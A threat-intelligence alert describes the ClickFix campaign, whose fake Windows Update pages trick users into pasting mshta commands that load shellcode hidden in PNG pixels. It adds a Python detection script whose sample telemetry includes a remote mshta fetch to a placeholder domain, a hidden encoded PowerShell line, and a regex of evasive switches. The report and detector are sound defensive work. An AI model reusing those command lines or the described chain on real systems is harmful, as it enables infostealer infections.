ClickFix Steganographic Malware Masquerades as Windows Update
Category:Threat Alerts / Threat Intelligence
The ClickFix campaign now delivers steganography-based malware through fake Windows Update screens that trick users into running mshta commands copied from their clipboard. On Windows systems, the lure imitates the native update UI in full-screen mode and instructs victims to open the Run dialog and paste and execute the command the page has already placed on their clipboard, mapping to MITRE ATT&CK T1204 (User Execution), T1059 (Command and Scripting Interpreter), and T1105 (Ingress Tool Transfer). The mshta payload fetches a script that eventually loads shellcode embedded in PNG images, often dropping LummaC2 or Rhadamanthys infostealers into trusted processes like explorer.exe.

The infection chain involves multiple stages: mshta.exe first retrieves an obfuscated JScript file from attacker infrastructure, which then runs PowerShell code laced with junk instructions to evade static analysis. PowerShell decrypts and loads a .NET assembly acting as a loader, which parses seemingly benign PNG images to extract hidden shellcode encoded in specific pixel color channels, especially the red channel. This custom steganography keeps malicious content off disk and concealed inside normal-looking images, significantly reducing detection rates by traditional scanners.

For organizations, the impact is the silent compromise of endpoints used for banking, SaaS access, and remote work, enabling keylogging, credential theft, and lateral movement from unmanaged or under-monitored devices. Because ClickFix relies on urgent prompts and familiar UI patterns, it can bypass user awareness training that focuses only on phishing emails. Compromise may undermine MFA by stealing session tokens or cookies and can lead to data theft affecting GDPR, HIPAA, or PCI-DSS scope when infected endpoints handle regulated data. The campaign also highlights growing abuse of clipboard actions and browser-based prompts as a vector to coerce users into running commands.
Mitigation requires blocking mshta.exe where possible, enforcing application control, and inspecting outbound traffic for suspicious script and image retrieval patterns from unknown domains. Security teams should educate users specifically about fake "security checks" and "update" pages that ask them to copy and paste commands, reinforce policies against running unverified scripts, and deploy EDR capable of detecting in-memory shellcode injections into explorer.exe and similar processes. Browser extensions or endpoint controls that block clipboard write attempts from websites can further reduce the success rate of ClickFix-style attacks.
CORTEX Protocol Intelligence Assessment
Business Impact: ClickFix blends social engineering with steganography to deliver infostealers that can exfiltrate credentials, financial data, and access tokens from corporate endpoints. Successful infections may provide attackers with persistent footholds in hybrid environments, leading to fraud, account takeover, and regulatory exposure where stolen data falls under GDPR or PCI-DSS.

Technical Context: The campaign chains mshta, obfuscated JScript, and PowerShell to load .NET-based loaders that extract shellcode hidden in PNG pixel channels, mapped to T1204, T1059, and T1105. Malware is injected into trusted Windows processes, making the activity harder to detect and enabling fileless-style execution.
Strategic Intelligence Guidance
- Disable or tightly restrict mshta.exe via group policy or application control on Windows endpoints and review EDR detections related to mshta and PowerShell spawning .NET assemblies.
- Deploy network controls and DNS filtering to block known ClickFix infrastructure, and monitor for anomalous downloads of scripts and PNG files from untrusted domains.
- Update user awareness programs to explicitly warn about fake Windows Update web pages and any instruction to copy-paste commands from browsers into local run dialogs or terminals.
- Longer term, adopt hardened browser profiles, clipboard protection, and default-deny execution policies on user endpoints to reduce the success of similar steganographic and script-based campaigns.
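The mitigation text and the first guidance item both call for reviewing EDR telemetry for mshta pulling remote content and spawning PowerShell. The following is an added example, not code from the original alert or from any vendor product: it runs a small set of detection rules over constructed process-creation records with Sysmon Event ID 1-style fields (pid, ppid, image, parent, cmdline) and correlates hits up the process tree so the chain surfaces as one finding. The field names, sample command lines, the domain and the PowerShell switch list are assumptions for illustration.

```python
"""Detection logic for the mshta -> PowerShell ClickFix chain (added example)."""
import re
from collections import defaultdict
from dataclasses import dataclass

URL_RE = re.compile(r"https?://", re.IGNORECASE)
# PowerShell switches that commonly appear in pasted one-liners. Illustrative
# list chosen for this example, not an indicator set taken from the alert.
PS_FLAGS_RE = re.compile(
    r"-(?:enc|encodedcommand|nop|noprofile|w\s+hidden|windowstyle\s+hidden"
    r"|ep\s+bypass|executionpolicy\s+bypass)\b",
    re.IGNORECASE,
)
INTERPRETERS = ("mshta.exe", "powershell.exe", "pwsh.exe")

# Constructed sample telemetry: a ClickFix-style chain (pids 5120 and 5144),
# a benign local .hta launch (5200) and a logon-script PowerShell (5300).
SAMPLE_EVENTS = [
    {"pid": 4100, "ppid": 900, "image": r"C:\Windows\explorer.exe",
     "parent": r"C:\Windows\System32\userinit.exe", "cmdline": "explorer.exe"},
    {"pid": 5120, "ppid": 4100, "image": r"C:\Windows\System32\mshta.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": "mshta https://update-check.example/verify"},
    {"pid": 5144, "ppid": 5120,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\System32\mshta.exe",
     "cmdline": "powershell -nop -w hidden -enc BASE64PAYLOAD_PLACEHOLDER"},
    {"pid": 5200, "ppid": 4100, "image": r"C:\Windows\System32\mshta.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": r'mshta "C:\Tools\inventory.hta"'},
    {"pid": 5300, "ppid": 1200,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\System32\gpscript.exe",
     "cmdline": r"powershell -File \\fs01\netlogon\map-drives.ps1"},
]


@dataclass(frozen=True)
class Finding:
    pid: int
    rule: str
    technique: str


def _name(path: str) -> str:
    """Lower-cased file name of an image path, tolerant of either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect(events):
    """Apply per-event rules; returns one Finding per rule hit."""
    findings = []
    for e in events:
        img, parent, cmd = _name(e["image"]), _name(e["parent"]), e["cmdline"]
        if img == "mshta.exe":
            if URL_RE.search(cmd):
                # mshta fetching a remote script is the ingress step of the chain.
                findings.append(Finding(e["pid"], "mshta_remote_script", "T1105"))
                if parent == "explorer.exe":
                    # Interactive launch (Run dialog) of a remote HTA matches the lure.
                    findings.append(Finding(e["pid"], "mshta_interactive_remote", "T1204"))
        elif img in ("powershell.exe", "pwsh.exe"):
            if parent == "mshta.exe":
                findings.append(Finding(e["pid"], "powershell_child_of_mshta", "T1059"))
            if PS_FLAGS_RE.search(cmd):
                findings.append(Finding(e["pid"], "powershell_evasive_flags", "T1059"))
    return findings


def correlate(events):
    """Group rule hits by the topmost interpreter in the process tree.

    Walks ppid links within the batch while the parent is itself mshta or
    PowerShell, so the mshta process becomes the root of the whole chain.
    Returns {root_pid: sorted rule names}.
    """
    by_pid = {e["pid"]: e for e in events}
    chains = defaultdict(set)
    for f in detect(events):
        root = f.pid
        while root in by_pid:
            parent = by_pid.get(by_pid[root]["ppid"])
            if parent is None or _name(parent["image"]) not in INTERPRETERS:
                break
            root = parent["pid"]
        chains[root].add(f.rule)
    return {pid: sorted(rules) for pid, rules in chains.items()}


def high_confidence(events):
    """Roots whose chain hit both an mshta rule and a PowerShell rule."""
    return sorted(
        pid for pid, rules in correlate(events).items()
        if any(r.startswith("mshta") for r in rules)
        and any(r.startswith("powershell") for r in rules)
    )


if __name__ == "__main__":
    for pid, rules in correlate(SAMPLE_EVENTS).items():
        print(f"root pid {pid}: {', '.join(rules)}")
    print("high-confidence ClickFix chains:", high_confidence(SAMPLE_EVENTS))
```

The single-event rules are deliberately noisy on their own (mshta launched from explorer.exe is also how a user double-clicks a local .hta), which is why the local `inventory.hta` launch produces no finding and why `high_confidence` only reports a root once both the ingress and the PowerShell stage are present in the same tree. In production the same logic would read Sysmon or EDR process events instead of the constructed list.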
Intelligence Source: ClickFix Steganographic Malware Masquerades as Windows Update | Nov 26, 2025